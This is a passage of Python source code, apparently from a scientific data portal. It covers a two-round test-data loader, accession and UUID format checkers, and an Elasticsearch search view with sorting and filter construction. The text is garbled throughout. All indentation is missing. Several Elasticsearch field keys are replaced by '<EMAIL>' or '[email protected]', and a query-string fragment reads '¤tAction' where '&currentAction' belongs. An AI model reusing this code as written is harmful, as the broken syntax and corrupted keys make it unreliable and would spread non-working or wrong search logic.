profiles = testapp.get('/profiles/?frame=raw').json
# run step1 - if item does not exist, post with minimal metadata
second_round_items = {}
if not patch_only:
for a_type in all_types:
# this conversion of schema name to object type works for all existing schemas at the moment
obj_type = "".join([i.title() for i in a_type.split('_')])
# minimal schema
schema_info = profiles[obj_type]
req_fields = schema_info.get('required', [])
ids = schema_info.get('identifyingProperties', [])
# some schemas did not include aliases
if 'aliases' not in ids:
ids.append('aliases')
# file format is required for files, but its usability depends this field
if a_type in ['file_format', 'experiment_type']:
req_fields.append('valid_item_types')
first_fields = list(set(req_fields+ids))
skip_existing_items = set()
posted = 0
skip_exist = 0
for an_item in store[a_type]:
try:
# 301 because @id is the existing item path, not uuid
testapp.get('/'+an_item['uuid'], status=[200, 301])
exists = True
except Exception:
exists = False
# skip the items that exists
# if overwrite=True, still include them in PATCH round
if exists:
skip_exist += 1
if not overwrite:
skip_existing_items.add(an_item['uuid'])
yield str.encode('SKIP: %s\n' % an_item['uuid'])
else:
post_first = {key: value for (key, value) in an_item.items() if key in first_fields}
post_first = format_for_attachment(post_first, docsdir)
try:
res = testapp.post_json('/'+a_type, post_first)
assert res.status_code == 201
posted += 1
# yield bytes to work with Response.app_iter
yield str.encode('POST: %s\n' % res.json['@graph'][0]['uuid'])
except Exception as e:
print('Posting {} failed. Post body:\n{}\nError Message:{}'
''.format(a_type, str(first_fields), str(e)))
# remove newlines from error, since they mess with generator output
e_str = str(e).replace('\n', '')
yield str.encode('ERROR: %s\n' % e_str)
return
# raise StopIteration
second_round_items[a_type] = [i for i in store[a_type] if i['uuid'] not in skip_existing_items]
logger.info('{} 1st: {} items posted, {} items exists.'.format(a_type, posted, skip_exist))
logger.info('{} 1st: {} items will be patched in second round'
.format(a_type, str(len(second_round_items.get(a_type, [])))))
elif overwrite:
logger.info('Posting round skipped')
for a_type in all_types:
second_round_items[a_type] = [i for i in store[a_type]]
logger.info('{}: {} items will be patched in second round'
.format(a_type, str(len(second_round_items.get(a_type, [])))))
# Round II - patch the rest of the metadata
rnd = ' 2nd' if not patch_only else ''
for a_type in all_types:
patched = 0
obj_type = "".join([i.title() for i in a_type.split('_')])
if not second_round_items[a_type]:
logger.info('{}{}: no items to patch'.format(a_type, rnd))
continue
for an_item in second_round_items[a_type]:
an_item = format_for_attachment(an_item, docsdir)
try:
add_last_modified(an_item, userid=LOADXL_USER_UUID)
res = testapp.patch_json('/'+an_item['uuid'], an_item)
assert res.status_code == 200
patched += 1
# yield bytes to work with Response.app_iter
yield str.encode('PATCH: %s\n' % an_item['uuid'])
except Exception as e:
print('Patching {} failed. Patch body:\n{}\n\nError Message:\n{}'.format(
a_type, str(an_item), str(e)))
e_str = str(e).replace('\n', '')
yield str.encode('ERROR: %s\n' % e_str)
return
# raise StopIteration
logger.info('{}{}: {} items patched .'.format(a_type, rnd, patched))
# explicit return upon finish
return None
def load_data(app, indir='inserts', docsdir=None, overwrite=False,
use_master_inserts=True):
"""
This function will take the inserts folder as input, and place them to the given environment.
args:
app:
indir (inserts): inserts folder, should be relative to tests/data/
docsdir (None): folder with attachment documents, relative to tests/data
"""
environ = {
'HTTP_ACCEPT': 'application/json',
'REMOTE_USER': 'TEST',
}
testapp = webtest.TestApp(app, environ)
# load master-inserts by default
if indir != 'master-inserts' and use_master_inserts:
master_inserts = resource_filename('encoded', 'tests/data/master-inserts/')
master_res = load_all(testapp, master_inserts, [])
if master_res: # None if successful
print(LOAD_ERROR_MESSAGE)
logger.error('load_data: failed to load from %s' % master_inserts, error=master_res)
return master_res
if not indir.endswith('/'):
indir += '/'
inserts = resource_filename('encoded', 'tests/data/' + indir)
if docsdir is None:
docsdir = []
else:
if not docsdir.endswith('/'):
docsdir += '/'
docsdir = [resource_filename('encoded', 'tests/data/' + docsdir)]
res = load_all(testapp, inserts, docsdir, overwrite=overwrite)
if res: # None if successful
print(LOAD_ERROR_MESSAGE)
logger.error('load_data: failed to load from %s' % docsdir, error=res)
return res
return None # unnecessary, but makes it more clear that no error was encountered
def load_test_data(app, overwrite=False):
"""
Load inserts and master-inserts
Returns:
None if successful, otherwise Exception encountered
"""
return load_data(app, docsdir='documents', indir='inserts',
overwrite=overwrite)
def load_local_data(app, overwrite=False):
"""
Load inserts from temporary insert folders, if present and populated
with .json insert files.
If not present, load inserts and master-inserts.
Returns:
None if successful, otherwise Exception encountered
"""
# if we have any json files in temp-local-inserts, use those
chk_dir = resource_filename('encoded', 'tests/data/temp-local-inserts')
use_temp_local = False
for (dirpath, dirnames, filenames) in os.walk(chk_dir):
use_temp_local = any([fn for fn in filenames if fn.endswith('.json')])
if use_temp_local:
return load_data(app, docsdir='documents', indir='temp-local-inserts',
use_master_inserts=False, overwrite=overwrite)
else:
return load_data(app, docsdir='documents', indir='inserts',
overwrite=overwrite)
def load_prod_data(app, overwrite=False):
"""
Load master-inserts
Returns:
None if successful, otherwise Exception encountered
"""
return load_data(app, indir='master-inserts', overwrite=overwrite)
```
#### File: src/encoded/schema_formats.py
```python
import re
from dcicutils.misc_utils import ignored, is_valid_absolute_uri
from jsonschema_serialize_fork import FormatChecker
from pyramid.threadlocal import get_current_request
from .server_defaults import (
ACCESSION_FACTORY,
ACCESSION_PREFIX,
ACCESSION_TEST_PREFIX,
test_accession,
)
ACCESSION_CODES = "BS|ES|EX|FI|FS|IN|SR|WF"
# Codes we allow for testing go here.
ACCESSION_TEST_CODES = "BS|ES|EX|FI|FS|IN|SR|WF"
accession_re = re.compile(r'^%s(%s)[1-9A-Z]{7}$' % (ACCESSION_PREFIX, ACCESSION_CODES))
test_accession_re = re.compile(r'^%s(%s)[0-9]{4}([0-9][0-9][0-9]|[A-Z][A-Z][A-Z])$' % (
ACCESSION_TEST_PREFIX, ACCESSION_TEST_CODES))
uuid_re = re.compile(r'(?i)[{]?(?:[0-9a-f]{4}-?){8}[}]?')
@FormatChecker.cls_checks("uuid")
def is_uuid(instance):
# Python's UUID ignores all dashes, whereas Postgres is more strict
# http://www.postgresql.org/docs/9.2/static/datatype-uuid.html
return bool(uuid_re.match(instance))
def is_accession(instance):
"""Just a pattern checker."""
# Unfortunately we cannot access the accessionType here
return (
accession_re.match(instance) is not None or
test_accession_re.match(instance) is not None
)
@FormatChecker.cls_checks("accession")
def is_accession_for_server(instance):
# Unfortunately we cannot access the accessionType here
if accession_re.match(instance):
return True
request = get_current_request()
if request.registry[ACCESSION_FACTORY] is test_accession:
if test_accession_re.match(instance):
return True
return False
@FormatChecker.cls_checks("gene_name")
def is_gene_name(instance):
"""This SHOULD check a webservice at HGNC/MGI for validation, but for now this just returns True always.."""
ignored(instance)
return True
@FormatChecker.cls_checks("target_label")
def is_target_label(instance):
if is_gene_name(instance):
return True
mod_histone_patt = "^H([234]|2A|2B)[KRT][0-9]+(me|ac|ph)"
fusion_patt = "^(eGFP|HA)-"
oneoff_patts = "^(Control|Methylcytidine|POLR2Aphospho[ST][0-9+])$"
if not re.match(mod_histone_patt, instance) or \
not re.match(fusion_patt, instance) or \
not re.match(oneoff_patts, instance):
return False
return True
@FormatChecker.cls_checks("uri", raises=ValueError)
def is_uri(instance):
return is_valid_absolute_uri(instance)
```
#### File: src/encoded/search.py
```python
import re
import math
import itertools
from functools import reduce
from pyramid.view import view_config
from webob.multidict import MultiDict
from snovault import (
AbstractCollection,
TYPES,
COLLECTIONS
)
from snovault.embed import make_subrequest
from snovault.elasticsearch import ELASTIC_SEARCH
from snovault.elasticsearch.create_mapping import determine_if_is_date_field
from snovault.elasticsearch.indexer_utils import get_namespaced_index
from snovault.resource_views import collection_view_listing_db
from snovault.util import (
find_collection_subtypes,
crawl_schema,
debug_log
)
from snovault.typeinfo import AbstractTypeInfo
from elasticsearch.helpers import scan
from elasticsearch_dsl import Search
from elasticsearch import (
TransportError,
RequestError,
ConnectionTimeout
)
from elasticsearch.exceptions import NotFoundError
from pyramid.httpexceptions import (
HTTPBadRequest,
HTTPFound
)
from urllib.parse import urlencode
from collections import OrderedDict
from copy import deepcopy
import uuid
import structlog
log = structlog.getLogger(__name__)
def includeme(config):
config.add_route('search', '/search{slash:/?}')
config.add_route('browse', '/browse{slash:/?}')
config.scan(__name__)
sanitize_search_string_re = re.compile(r'[\\\+\-\&\|\!\(\)\{\}\[\]\^\~\:\/\\\*\?]')
COMMON_EXCLUDED_URI_PARAMS = [
'frame', 'format', 'limit', 'sort', 'from', 'field',
'mode', 'redirected_from', 'datastore', 'referrer',
'currentAction', 'additional_facet'
]
@view_config(route_name='search', request_method='GET', permission='search')
@debug_log
def search(context, request, search_type=None, return_generator=False, forced_type='Search', custom_aggregations=None):
"""
Search view connects to ElasticSearch and returns the results
"""
types = request.registry[TYPES]
# list of item types used from the query
doc_types = set_doc_types(request, types, search_type)
# calculate @type. Exclude ItemSearchResults unless no other types selected.
search_types = build_search_types(types, doc_types)
search_types.append(forced_type) # the old base search type
# sets request.normalized_params
search_base = normalize_query(request, types, doc_types)
### INITIALIZE RESULT.
result = {
'@context': request.route_path('jsonld_context'),
'@id': '/' + forced_type.lower() + '/' + search_base,
'@type': search_types,
'title': forced_type,
'filters': [],
'facets': [],
'@graph': [],
'notification': '',
'sort': {}
}
principals = request.effective_principals
es = request.registry[ELASTIC_SEARCH]
# Get static section (if applicable) when searching a single item type
# Note: Because we rely on 'source', if the static_section hasn't been indexed
# into Elasticsearch it will not be loaded
if (len(doc_types) == 1) and 'Item' not in doc_types:
search_term = 'search-info-header.' + doc_types[0]
try:
static_section = request.registry['collections']['StaticSection'].get(search_term)
except Exception: # search could fail, NotFoundError does not catch for some reason
static_section = None
if static_section and hasattr(static_section.model, 'source'):
item = static_section.model.source['object']
result['search_header'] = {}
result['search_header']['content'] = item['content']
result['search_header']['title'] = item.get('title', item['display_title'])
result['search_header']['filetype'] = item['filetype']
from_, size = get_pagination(request)
# get desired frame for this search
search_frame = request.normalized_params.get('frame', 'embedded')
### PREPARE SEARCH TERM
prepared_terms = prepare_search_term(request)
schemas = [types[item_type].schema for item_type in doc_types]
# set ES index based on doc_type (one type per index)
# if doc_type is item, search all indexes by setting es_index to None
# If multiple, search all specified
if 'Item' in doc_types:
es_index = get_namespaced_index(request, '*')
else:
es_index = find_index_by_doc_types(request, doc_types, ['Item'])
# establish elasticsearch_dsl class that will perform the search
search = Search(using=es, index=es_index)
# set up clear_filters path
result['clear_filters'] = clear_filters_setup(request, doc_types, forced_type)
### SET TYPE FILTERS
build_type_filters(result, request, doc_types, types)
# get the fields that will be used as source for the search
# currently, supports frame=raw/object but live faceting does not work
# this is okay because the only non-embedded access will be programmatic
source_fields = sorted(list_source_fields(request, doc_types, search_frame))
### GET FILTERED QUERY
# Builds filtered query which supports multiple facet selection
search, string_query = build_query(search, prepared_terms, source_fields)
### Set sort order
search = set_sort_order(request, search, prepared_terms, types, doc_types, result, schemas)
# TODO: implement BOOST here?
### Set filters
search, query_filters = set_filters(request, search, result, principals, doc_types)
### Set starting facets
additional_facets = request.normalized_params.getall('additional_facet')
facets = initialize_facets(request, doc_types, prepared_terms, schemas, additional_facets)
### Adding facets, plus any optional custom aggregations.
### Uses 'size' and 'from_' to conditionally skip (no facets if from > 0; no aggs if size > 0).
search = set_facets(search, facets, query_filters, string_query, request, doc_types, custom_aggregations, size, from_)
### Add preference from session, if available
search_session_id = None
created_new_search_session_id = False
if request.__parent__ is None and not return_generator and size != 'all': # Probably unnecessary, but skip for non-paged, sub-reqs, etc.
search_session_id = request.cookies.get('searchSessionID')
if not search_session_id:
search_session_id = 'SESSION-' + str(uuid.uuid1())
created_new_search_session_id = True
search = search.params(preference=search_session_id)
### Execute the query
if size == 'all':
es_results = execute_search_for_all_results(search)
else:
size_search = search[from_:from_ + size]
es_results = execute_search(size_search)
### Record total number of hits
result['total'] = total = es_results['hits']['total']
result['facets'] = format_facets(es_results, facets, total, additional_facets, search_frame)
result['aggregations'] = format_extra_aggregations(es_results)
# Add batch actions
# TODO: figure out exactly what this does. Provide download URLs?
# Implement later
# result.update(search_result_actions(request, doc_types, es_results))
### Add all link for collections
if size not in (None, 'all') and size < result['total']:
params = [(k, v) for k, v in request.normalized_params.items() if k != 'limit']
params.append(('limit', 'all'))
if context:
result['all'] = '%s?%s' % (request.resource_path(context), urlencode(params))
# add actions (namely 'add')
result['actions'] = get_collection_actions(request, types[doc_types[0]])
if not result['total']:
# http://googlewebmastercentral.blogspot.com/2014/02/faceted-navigation-best-and-5-of-worst.html
request.response.status_code = 404
result['notification'] = 'No results found'
result['@graph'] = []
return result if not return_generator else []
columns = build_table_columns(request, schemas, doc_types)
if columns:
result['columns'] = columns
result['notification'] = 'Success'
### Format results for JSON-LD
graph = format_results(request, es_results['hits']['hits'], search_frame)
if request.__parent__ is not None or return_generator:
if return_generator:
return graph
else:
result['@graph'] = list(graph)
return result
result['@graph'] = list(graph)
if created_new_search_session_id:
request.response.set_cookie('searchSessionID', search_session_id) # Save session ID for re-requests / subsequent pages.
return result
DEFAULT_BROWSE_PARAM_LISTS = {
'type' : ["ExperimentSetReplicate"],
'experimentset_type' : ['replicate'],
# Uncomment if changing back to showing external data: false by default
# 'award.project' : ['4DN']
}
@view_config(route_name='browse', request_method='GET', permission='search')
@debug_log
def browse(context, request, search_type='ExperimentSetReplicate', return_generator=False):
"""
Simply use search results for browse view
Redirect to proper URL w. params if needed
"""
orig_params = request.params
for k,vals in DEFAULT_BROWSE_PARAM_LISTS.items():
if k == 'award.project':
# Could be external or not
continue
if k not in orig_params or orig_params[k] not in vals:
# Redirect to DEFAULT_BROWSE_PARAM_LISTS URL
next_qs = MultiDict()
for k2, v2list in DEFAULT_BROWSE_PARAM_LISTS.items():
for v2 in v2list:
next_qs.add(k2, v2)
# Preserve other keys that arent in DEFAULT_BROWSE_PARAM_LISTS
for k2, v2 in orig_params.items():
if k2 not in DEFAULT_BROWSE_PARAM_LISTS:
next_qs.add(k2, v2)
# next_qs.add("redirected_from", str(request.path_qs))
return HTTPFound(
location=str(request.path) + '?' + urlencode(next_qs),
detail="Redirected from " + str(request.path_info)
)
return search(context, request, search_type, return_generator, forced_type='Browse')
@view_config(context=AbstractCollection, permission='list', request_method='GET')
@debug_log
def collection_view(context, request):
"""
Simply use search results for collections views (e.g./biosamples/)
This is a redirect directly to the search page
"""
return search(context, request, context.type_info.name, False, forced_type='Search')
def build_search_types(types, doc_types):
"""
Builds `search_types` based on the requested search `type` in URI param (=> `doc_types`).
:param types: TypesTool from the registry
:param doc_types: Type names we would like to search on.
:return: search_types, or a list of 'SearchResults' type candidates
"""
encompassing_ti_for_all_items = None
for requested_search_type in doc_types: # Handles if only 1 type in here, also.
ti = types[requested_search_type] # 'ti' == 'Type Item'
if encompassing_ti_for_all_items and encompassing_ti_for_all_items.name == "Item":
break # No other higher-level base type
if encompassing_ti_for_all_items is None: # Set initial 'all-encompassing' item type
encompassing_ti_for_all_items = ti
continue
if hasattr(ti, 'base_types'):
# Also handles if same / duplicate requested_search_type encountered (for some reason).
types_list = [requested_search_type] # Self type and base types of requested_search_type
for base_type in ti.base_types:
types_list.append(base_type)
for base_type in types_list:
if encompassing_ti_for_all_items.name == base_type:
break # out of inner loop and continue
if hasattr(encompassing_ti_for_all_items, "base_types") and base_type in encompassing_ti_for_all_items.base_types:
# Will ultimately succeed at when base_type="Item", if not any earlier.
encompassing_ti_for_all_items = types[base_type]
break # out of inner loop and continue
search_types = [ encompassing_ti_for_all_items.name ]
if hasattr(encompassing_ti_for_all_items, "base_types"):
for base_type in encompassing_ti_for_all_items.base_types:
search_types.append(base_type)
if search_types[-1] != "Item":
search_types.append("Item")
return [ t + "SearchResults" for t in search_types ]
def get_collection_actions(request, type_info):
collection = request.registry[COLLECTIONS].get(type_info.name)
if hasattr(collection, 'actions'):
return collection.actions(request)
else:
return None
def get_pagination(request):
"""
Fill from_ and size parameters for search if given in the query string
"""
from_ = request.normalized_params.get('from', 0)
size = request.normalized_params.get('limit', 25)
if size in ('all', ''):
size = "all"
else:
try:
size = int(size)
except ValueError:
size = 25
try:
from_ = int(from_)
except ValueError:
size = 0
return from_, size
def get_all_subsequent_results(initial_search_result, search, extra_requests_needed_count, size_increment):
from_ = 0
while extra_requests_needed_count > 0:
#print(str(extra_requests_needed_count) + " requests left to get all results.")
from_ = from_ + size_increment
subsequent_search = search[from_:from_ + size_increment]
subsequent_search_result = execute_search(subsequent_search)
extra_requests_needed_count -= 1
for hit in subsequent_search_result['hits'].get('hits', []):
yield hit
def execute_search_for_all_results(search):
size_increment = 100 # Decrease this to like 5 or 10 to test.
first_search = search[0:size_increment] # get aggregations from here
es_result = execute_search(first_search)
total_results_expected = es_result['hits'].get('total',0)
extra_requests_needed_count = int(math.ceil(total_results_expected / size_increment)) - 1 # Decrease by 1 (first es_result already happened)
if extra_requests_needed_count > 0:
es_result['hits']['hits'] = itertools.chain(es_result['hits']['hits'], get_all_subsequent_results(es_result, search, extra_requests_needed_count, size_increment))
return es_result
def normalize_query(request, types, doc_types):
"""
Normalize the query by calculating and setting request.normalized_params
(a webob MultiDict) that is derived from custom query rules and also
the list of doc_types specified by set_doc_types(). The normalize_param
helper function finds field_schema for each query parameter and enforces
a set of rules (see below). If the query item types differ from doc_types,
override with doc_types
Args:
request: the current Request
types: registry[TYPES]
doc_types (list): item_types to use for the search
Returns:
string: query string built from normalized params
"""
def normalize_param(key, val):
"""
Process each key/val in the original query param. As part of this,
obtain the field schema for each parameter.
Current rules:
- for 'type', get name from types (from the registry)
- append '.display_title' to any terminal linkTo query field
- append '.display_title' to sorts on fields
"""
# type param is a special case. use the name from TypeInfo
if key == 'type' and val in types:
return (key, types[val].name)
# if key is sort, pass val as the key to this function
# if it appends display title we know its a linkTo and
# should be treated as such
if key == 'sort':
# do not use '-' if present
sort_val = val[1:] if val.startswith('-') else val
new_val, _ = normalize_param(sort_val, None)
if new_val != sort_val:
val = val.replace(sort_val, new_val)
return (key, val)
# find schema for field parameter and drill down into arrays/subobjects
field_schema = schema_for_field(key, request, doc_types)
while field_schema and ('items' in field_schema or 'properties' in field_schema):
try:
field_schema = field_schema['items']
except KeyError:
pass
try:
field_schema = field_schema['properties']
except KeyError:
pass
if field_schema and 'linkTo' in field_schema:
# add display_title to terminal linkTo query fields
if key.endswith('!'): # handle NOT
return (key[:-1] + '.display_title!', val)
return (key + '.display_title', val)
else:
return (key, val)
normalized_params = (
normalize_param(k, v)
for k, v in request.params.items()
)
# use a MultiDict to emulate request.params
normalized_params = MultiDict(normalized_params)
# overwrite 'type' if not equal to doc_types
if set(normalized_params.getall('type')) != set(doc_types):
if 'type' in normalized_params:
del normalized_params['type']
for dtype in doc_types:
normalized_params.add('type', dtype)
# add the normalized params to the request
# these will be used in place of request.params for the rest of search
setattr(request, 'normalized_params', normalized_params)
# the query string of the normalized search
qs = '?' + urlencode([
(k.encode('utf-8'), v.encode('utf-8'))
for k, v in request.normalized_params.items()
])
return qs
def clear_filters_setup(request, doc_types, forced_type):
'''
Clear Filters URI path
Make a URI path that clears all non-datatype filters
and leaves in `q` (search query) params, if present.
Also preserves currentAction=selection (or multiselect), if is set.
Returns:
A URL path
'''
seach_query_specs = request.normalized_params.getall('q')
seach_query_url = urlencode([("q", seach_query) for seach_query in seach_query_specs])
# types_url will always be present (always >=1 doc_type)
types_url = urlencode([("type", typ) for typ in doc_types])
current_action = request.normalized_params.get('currentAction')
clear_qs = types_url or ''
if seach_query_url:
clear_qs += '&' + seach_query_url
if current_action == 'selection' or current_action == 'multiselect':
clear_qs += ('¤tAction=' + current_action)
current_search_sort = request.normalized_params.getall('sort')
current_search_sort_url = urlencode([("sort", s) for s in current_search_sort])
if current_search_sort_url:
clear_qs += '&' + current_search_sort_url
return request.route_path(forced_type.lower(), slash='/') + (('?' + clear_qs) if clear_qs else '')
def build_type_filters(result, request, doc_types, types):
"""
Set the type filters for the search. If no doc_types, default to Item
"""
if not doc_types:
doc_types = ['Item']
else:
for item_type in doc_types:
ti = types[item_type]
qs = urlencode([
(k.encode('utf-8'), v.encode('utf-8'))
for k, v in request.normalized_params.items() if not (k == 'type' and types.all.get('Item' if v == '*' else v) is ti)
])
result['filters'].append({
'field': 'type',
'term': ti.name,
'remove': '{}?{}'.format(request.path, qs)
})
def prepare_search_term(request):
"""
Prepares search terms by making a dictionary where the keys are fields
and the values are arrays of query strings
Ignore certain keywords, such as type, format, and field
"""
prepared_terms = {}
for field, val in request.normalized_params.items():
if field.startswith('validation_errors') or field.startswith('aggregated_items') or \
field == 'additional_facet':
continue
elif field == 'q': # searched string has field 'q'
# people shouldn't provide multiple queries, but if they do,
# combine them with AND logic
if 'q' in prepared_terms:
join_list = [prepared_terms['q'], val]
prepared_terms['q'] = ' AND '.join(join_list)
else:
prepared_terms['q'] = val
elif field not in COMMON_EXCLUDED_URI_PARAMS + ['type']:
if 'embedded.' + field not in prepared_terms.keys():
prepared_terms['embedded.' + field] = []
prepared_terms['embedded.' + field].append(val)
return prepared_terms
def set_doc_types(request, types, search_type):
"""
Set the type of documents resulting from the search; order and check for
invalid types as well. If a forced search_type is enforced, use that;
otherwise, set types from the query params. Default to Item if none set.
Args:
request: the current Request
types: registry[TYPES]
search_type (str): forced search item type
Returns:
list: the string item types to use for the search
Raises:
HTTPBadRequest: if an invalid item type is supplied
"""
doc_types = []
if search_type is None:
doc_types = request.params.getall('type')
if '*' in doc_types:
doc_types = ['Item']
else:
doc_types = [search_type]
# Normalize to item_type
try:
doc_types = sorted({types[name].name for name in doc_types})
except KeyError:
# Check for invalid types
bad_types = [t for t in doc_types if t not in types]
msg = "Invalid type: {}".format(', '.join(bad_types))
raise HTTPBadRequest(explanation=msg)
if len(doc_types) == 0:
doc_types = ['Item']
return doc_types
def get_search_fields(request, doc_types):
"""
Returns set of columns that are being searched and highlights
"""
fields = {'uuid'}
highlights = {}
types = request.registry[TYPES]
for doc_type in doc_types:
type_info = types[doc_type]
for value in type_info.schema.get('boost_values', ()):
fields.add('embedded.' + value)
highlights['embedded.' + value] = {}
return fields, highlights
def list_source_fields(request, doc_types, frame):
"""
Returns set of fields that are requested by user or default fields.
These fields are used to further limit the results from the search.
Note that you must provide the full fieldname with embeds, such as:
'field=biosample.biosource.individual.organism.name' and not just
'field=name'
"""
fields_requested = request.normalized_params.getall('field')
if fields_requested:
fields = ['embedded.@id', 'embedded.@type']
for field in fields_requested:
fields.append('embedded.' + field)
elif frame in ['embedded', 'object', 'raw']:
if frame != 'embedded':
# frame=raw corresponds to 'properties' in ES
if frame == 'raw':
frame = 'properties'
# let embedded be searched as well (for faceting)
fields = ['embedded.*', frame + '.*']
else:
fields = [frame + '.*']
else:
fields = ['embedded.*']
return fields
def build_query(search, prepared_terms, source_fields):
"""
Prepare the query within the Search object.
"""
query_info = {}
string_query = None
# set _source fields for the search
search = search.source(list(source_fields))
# prepare the query from prepared_terms
for field, value in prepared_terms.items():
if field == 'q':
query_info['query'] = value
query_info['lenient'] = True
query_info['default_operator'] = 'AND'
query_info['fields'] = ['full_text']
break
if query_info != {}:
string_query = {'must': {'simple_query_string': query_info}}
query_dict = {'query': {'bool': string_query}}
else:
query_dict = {'query': {'bool':{}}}
search.update_from_dict(query_dict)
return search, string_query
def set_sort_order(request, search, search_term, types, doc_types, result, schemas):
"""
sets sort order for elasticsearch results
example: /search/?type=Biosource&sort=display_title
will sort by display_title in ascending order. To set descending order,
use the "-" flag: sort_by=-date_created.
Sorting is done alphatbetically, case sensitive by default.
TODO: add a schema flag for case sensitivity/insensitivity?
ES5: simply pass in the sort OrderedDict into search.sort
"""
sort = OrderedDict()
result_sort = OrderedDict()
if len(doc_types) == 1:
type_schema = types[doc_types[0]].schema
else:
type_schema = None
def add_to_sort_dict(requested_sort):
if requested_sort.startswith('-'):
name = requested_sort[1:]
order = 'desc'
else:
name = requested_sort
order = 'asc'
sort_schema = schema_for_field(name, request, doc_types)
if sort_schema:
sort_type = sort_schema.get('type')
else:
sort_type = 'string'
# ES type != schema types
if sort_type == 'integer':
sort['embedded.' + name] = result_sort[name] = {
'order': order,
'unmapped_type': 'long',
'missing': '_last'
}
elif sort_type == 'number':
sort['embedded.' + name] = result_sort[name] = {
'order': order,
'unmapped_type': 'float',
'missing': '_last'
}
elif sort_schema and determine_if_is_date_field(name, sort_schema):
sort['embedded.' + name + '.raw'] = result_sort[name] = {
'order': order,
'unmapped_type': 'date',
'missing': '_last'
}
else:
# fallback case, applies to all string type:string fields
sort['embedded.' + name + '.lower_case_sort'] = result_sort[name] = {
'order': order,
'unmapped_type': 'keyword',
'missing': '_last'
}
# Prefer sort order specified in request, if any
requested_sorts = request.normalized_params.getall('sort')
if requested_sorts:
for rs in requested_sorts:
add_to_sort_dict(rs)
else:
# check default sort fields defined in the schema
# example definition:
# "default_sort_fields": [
# {
# "field_name": "date_published",
# "order": "desc"
# },
# {
# "field_name": "display_title",
# "order": "asc"
# }
# ]
for schema in schemas:
if 'default_sort_fields' in schema:
for fields in schema['default_sort_fields']:
order = fields.get('order','')
fieldName = fields.get('field_name','')
if order and order == 'desc':
fieldName = '-' + fieldName
add_to_sort_dict(fieldName)
text_search = search_term.get('q')
# Otherwise we use a default sort only when there's no text search to be ranked
if not sort and (text_search == '*' or not text_search):
# If searching for a single type, look for sort options in its schema
if type_schema:
if 'sort_by' in type_schema:
for k, v in type_schema['sort_by'].items():
# Should always sort on raw field rather than analyzed field
# OR search on lower_case_sort for case insensitive results
sort['embedded.' + k + '.lower_case_sort'] = result_sort[k] = v
# Default is most recent first, then alphabetical by label
if not sort:
sort['embedded.date_created.raw'] = result_sort['date_created'] = {
'order': 'desc',
'unmapped_type': 'keyword',
}
sort['embedded.label.raw'] = result_sort['label'] = {
'order': 'asc',
'missing': '_last',
'unmapped_type': 'keyword',
}
elif not sort and text_search and text_search != '*':
search = search.sort( # Multi-level sort. See http://www.elastic.co/guide/en/elasticsearch/guide/current/_sorting.html#_multilevel_sorting & https://stackoverflow.com/questions/46458803/python-elasticsearch-dsl-sorting-with-multiple-fields
{ '_score' : { "order": "desc" } },
{ 'embedded.date_created.raw' : { 'order': 'desc', 'unmapped_type': 'keyword' }, 'embedded.label.raw' : { 'order': 'asc', 'unmapped_type': 'keyword', 'missing': '_last' } },
{ '_uid' : { 'order': 'asc' } } # 'embedded.uuid.raw' (instd of _uid) sometimes results in 400 bad request : 'org.elasticsearch.index.query.QueryShardException: No mapping found for [embedded.uuid.raw] in order to sort on'
)
result['sort'] = result_sort = { '_score' : { "order" : "desc" } }
return search
if sort and result_sort:
result['sort'] = result_sort
search = search.sort(sort)
return search
def set_filters(request, search, result, principals, doc_types):
"""
Sets filters in the query
"""
# these next two dictionaries should each have keys equal to query_field
# and values: must_terms: [<list of terms>], must_not_terms: [<list of terms>], add_no_value: True/False/None
field_filters = {
'principals_allowed.view' : {
'must_terms': principals,
'must_not_terms': [],
'add_no_value': None
},
'<EMAIL>' : {
'must_terms': doc_types,
'must_not_terms': [],
'add_no_value': None
},
'embedded.status.raw' : {
'must_terms': [],
'must_not_terms': [],
'add_no_value': None
}
}
range_filters = {}
# Exclude status=deleted Items unless explicitly requested/filtered-in.
if 'deleted' not in request.normalized_params.getall('status'):
field_filters['embedded.status.raw']['must_not_terms'].append('deleted')
if 'replaced' not in request.normalized_params.getall('status'):
field_filters['embedded.status.raw']['must_not_terms'].append('replaced')
# Exclude type=TrackingItem and type=OntologyTerm from results unless are explictly specified
if 'TrackingItem' not in doc_types:
field_filters['<EMAIL>.<EMAIL>']['must_not_terms'].append('TrackingItem')
if 'OntologyTerm' not in doc_types:
field_filters['embedded.<EMAIL>.raw']['must_not_terms'].append('OntologyTerm')
for field, term in request.normalized_params.items():
not_field = False # keep track if query is NOT (!)
exists_field = False # keep track of null values
range_type = False # If we determine is a range request (field.to, field.from), will be populated with string 'date' or 'numerical'
range_direction = None
if field in COMMON_EXCLUDED_URI_PARAMS + ['q']:
continue
elif field == 'type' and term != 'Item':
continue
elif term == 'No value':
exists_field = True
# Check for date or numerical range filters
if (len(field) > 3 and field[-3:] == '.to') or (len(field) > 5 and field[-5:] == '.from'):
if field[-3:] == '.to':
f_field = field[:-3]
range_direction = "lte"
else:
f_field = field[:-5]
range_direction = "gte"
# If schema for field is not found (and range_type thus not set),
# then treated as ordinary term filter (likely will get 0 results)
field_schema = schema_for_field(f_field, request, doc_types)
if field_schema:
range_type = 'date' if determine_if_is_date_field(f_field, field_schema) else 'numerical'
# Add filter to result
qs = urlencode([
(k.encode('utf-8'), v.encode('utf-8'))
for k, v in request.normalized_params.items()
if (k != field or v != term)
])
remove_path = '{}?{}'.format(request.path, qs)
# default to searching type=Item rather than empty filter path
if remove_path[-1] == '?':
remove_path += 'type=Item'
result['filters'].append({
'field' : field,
'term' : term,
'remove': remove_path
})
# handle NOT
if field.endswith('!'):
field = field[:-1]
not_field = True
# Add filter to query
if range_type and f_field and range_type in ('date', 'numerical'):
query_field = 'embedded.' + f_field
elif field.startswith('validation_errors') or field.startswith('aggregated_items'):
query_field = field + '.raw'
elif field == 'type':
query_field = '[email protected]'
else:
query_field = 'embedded.' + field + '.raw'
if range_type:
if query_field not in range_filters:
range_filters[query_field] = {}
if range_type == 'date':
range_filters[query_field]['format'] = 'yyyy-MM-dd HH:mm'
if range_direction in ('gt', 'gte', 'lt', 'lte'):
if range_type == "date" and len(term) == 10:
# Correct term to have hours, e.g. 00:00 or 23:59, if not otherwise supplied.
if range_direction == 'gt' or range_direction == 'lte':
term += ' 23:59'
elif range_direction == 'gte' or range_direction == 'lt':
term += ' 00:00'
if range_filters[query_field].get(range_direction) is None:
range_filters[query_field][range_direction] = term
else:
# If have a value already (e.g. multiple ranges selected), choose the widening option.
if range_direction == 'gt' or range_direction == 'gte':
if term < range_filters[query_field][range_direction]:
range_filters[query_field][range_direction] = term
